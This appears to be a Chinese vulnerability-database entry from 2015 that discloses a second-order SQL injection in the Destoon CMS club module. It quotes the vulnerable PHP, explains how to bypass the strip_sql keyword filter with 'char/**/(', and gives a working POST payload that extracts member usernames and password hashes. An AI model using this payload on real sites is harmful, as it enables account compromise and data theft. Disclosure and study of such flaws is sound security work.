destoon最新版注入(绕过过滤出任意数据)

基本字段

漏洞编号:
SSV-94504
披露/发现时间:
2015-11-03
提交时间:
2015-11-03
漏洞等级:
漏洞类别:
其他类型
影响组件:
Destoon
漏洞作者:
玉林嘎
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 Knownsec 共获得  0KB

简要描述:

我会告诉你是三次注入么.

详细说明:

destoon最新版 漏洞文件:/module/club/my_group.inc.php

case 'add':
        if($MG['club_group_limit'] && $limit_used >= $MG['club_group_limit']) dalert(lang($L['info_limit'], array($MG['club_group_limit'], $limit_used)), $MODULE[2]['linkurl'].$DT['file_my'].'?mid='.$mid.'&job='.$job);
        $need_captcha = $MOD['captcha_group'] == 2 ? $MG['captcha'] : $MOD['captcha_group'];
        $need_question = $MOD['question_group'] == 2 ? $MG['question'] : $MOD['question_group'];
        if($submit) {
            $msg = captcha($captcha, $need_captcha, true);
            if($msg) dalert($msg);
            $msg = question($answer, $need_question, true);
            if($msg) dalert($msg);
            $post['username'] = $_username;
            if($do->pass($post)) {
                $CAT = get_cat($post['catid']);
                if(!$CAT) dalert(lang($L['group'], array($CAT['catname'])));
                $post['addtime'] = $post['level'] = $post['fee'] = 0;
                $post['style'] = $post['template'] = $post['note'] = $post['filepath'] = '';
                $need_check =  $MOD['check_group'] == 2 ? $MG['check'] : $MOD['check_group'];
                $post['status'] = get_status(3, $need_check);
                $post['hits'] = 0;
                $post['areaid'] = $cityid;
                $post['filepath'] = '';
                $do->add($post);
                $msg = $post['status'] == 2 ? $L['success_check'] : $L['success_add'];
                $js = '';
                set_cookie('dmsg', $msg);
                $forward = $MODULE[2]['linkurl'].$DT['file_my'].'?mid='.$mid.'&job='.$job.'&status='.$post['status'];
                $msg = '';
                $js .= 'window.onload=function(){parent.window.location="'.$forward.'";}';
                dalert($msg, '', $js);
            } else {
                dalert($do->errmsg, '', ($need_captcha ? reload_captcha() : '').($need_question ? reload_question() : ''));
            }
        } else {
            foreach($do->fields as $v) {
                $$v = '';
            }
            $content = '';
            $catid = intval($catid);
            $areaid = $cityid;
            $item = array();
        }
    break;
case 'edit':
        $itemid or message();
        $do->itemid = $itemid;
        $item = $do->get_one();
        if(!$item || $item['username'] != $_username) message();
        if($submit) {
            $post['username'] = $_username;
            if($do->pass($post)) {
                $post['catid'] = $item['catid'];
                $post['title'] = $item['title'];
                $post['level'] = $item['level'];
                $post['fee'] = $item['fee'];
                $post['style'] = $item['style'];
                $post['template'] = $item['template'];
                $post['filepath'] = $item['filepath'];
                $post['status'] = $item['status'];
                $post['hits'] = $item['hits'];
                $do->edit($post);
                set_cookie('dmsg', $L['success_edit']);
                dalert('', '', 'parent.window.location="'.$forward.'"');
            } else {
                dalert($do->errmsg);
            }
        } else {
            extract($item);
        }
    break;

首先通过add操作 可引入\ 而在edit操作中 $item = $do->get_one(); 直接取出 $item['title'] 传给$post 参数 进入edit函数 无任何过滤 而在文件:/module/club/group.class.php (add() edit()所在文件)

function edit($post) {
        $this->delete($this->itemid, false);
        $post = $this->set($post);
        $sql = '';
        foreach($post as $k=>$v) {
            if(in_array($k, $this->fields)) $sql .= ",$k='$v'";
        }
        $sql = substr($sql, 1);
        $this->db->query("UPDATE {$this->table} SET $sql WHERE itemid=$this->itemid");
        $this->update($this->itemid);
        clear_upload($post['thumb']);
        return true;
    }

$post数组里面不仅有之前从数据库取出,也通过post传入了 $post[thumb] $post[content] 而2个变量 在后面的update操作刚好在$title后面 于是通过$title引入\ 转义' 后面一个参数在加以控制进行注入 漏洞大概原理如此 其他下面说

漏洞证明:

证明: 注册个企业会员 创建商圈 title处引入\

1.png

然后在编辑

2.jpg

然后你会发现thumb 和 content传入先后 就是他们update顺序的先后 而thumb会有个is_url的检测不可控制 所以先传入content 即可解决 接下来是绕过过滤的问题了

function strip_sql($string, $type = 1) {
    $match = array("/union/i","/where/i","/having/i","/outfile/i","/dumpfile/i","/0x([a-f0-9]{2,})/i","/select([\s\S]*?)from/i","/select([\s\*\/\-\{\(\+@`])/i","/update([\s\*\/\-\{\(\+@`])/i","/replace([\s\*\/\-\{\(\+@`])/i","/delete([\s\*\/\-\{\(\+@`])/i","/drop([\s\*\/\-\{\(\+@`])/i","/load_file[\s]*\(/i","/substring[\s]*\(/i","/substr[\s]*\(/i","/left[\s]*\(/i","/right[\s]*\(/i","/mid[\s]*\(/i","/concat[\s]*\(/i","/concat_ws[\s]*\(/i","/make_set[\s]*\(/i","/ascii[\s]*\(/i","/bin[\s]*\(/i","/oct[\s]*\(/i","/hex[\s]*\(/i","/ord[\s]*\(/i","/char[\s]*\(/i","/conv[\s]*\(/i");
    $replace = array('union','where','having','outfile','dumpfile','0x\\1','select\\1from','select\\1','update\\1','replace\\1','delete\\1','drop\\1','load_file(','substring(','substr(','left(','right(','mid(','concat(','concat_ws(','make_set(','ascii(','bin(','oct(','hex(','ord(','char(','conv(');
    if($type) {
        return is_array($string) ? array_map('strip_sql', $string) : preg_replace($match, $replace, $string);
    } else {
        return str_replace(array('d', 'e', 'g', 'i', 'm', 'n','p', 'r', 's', 't', 'v', 'x'), array('d', 'e', 'g', 'i', 'm', 'n', 'p', 'r', 's', 't', 'v', 'x'), $string);
    }
}

细看你会发现这个过滤中所以 ascii( char( 的过滤方式存在问题 /char[\s]*(/i

我们可以传入char/**/(1) 即可绕过 但是直接出数据不可能了 那我们更新好我们的语句 再一次编辑 再进行注入 这样就是3次注入啦 而且在edit() 中set() 中最后会进行次$post = dhtmlspecialchars($post); 所以直接引入' 还是不行 还是只能引入\ 2个参数注入 但是content是永远从post直接获取的 于是重新挑选

$post['catid'] = $item['catid'];
$post['title'] = $item['title'];
$post['level'] = $item['level'];
$post['fee'] = $item['fee'];
$post['style'] = $item['style'];
$post['template'] = $item['template'];
$post['filepath'] = $item['filepath'];
$post['status'] = $item['status'];
$post['hits'] = $item['hits'];

我们挑选template 和 filepath 配合注入 第一次编辑 content 应该是

post%5Bcontent%5D=,template=char/**/(92),filepath=char/**/(44,99,111,110,116,101,110,116,61,40,115,101,108,101,99,116,32,99,111,110,99,97,116,40,117,115,101,114,110,97,109,101,44,112,97,115,115,119,111,114,100,41,32,102,114,111,109,32,100,101,115,116,111,111,110,95,109,101,109,98,101,114,32,108,105,109,105,116,32,49,41,35)#

template 引入 \ filepath则是

,content=(select concat(username,password) from destoon_member limit 1)#

3.png

注意 content在前 thumb在后

5.png

之后再编辑一次 点进去就看到

QQ图片20151102205815.png

乌云编辑器\被转义啦。。。 - -

共 0  兑换了

PoC

暂无 PoC

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

生命线

  • 2015-11-03 发现/披露了漏洞

相关漏洞

人气 1397
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负

京ICP备10040895号 京公网安备 11010502034610号 Copyright @ 404 Team from Knownsec. English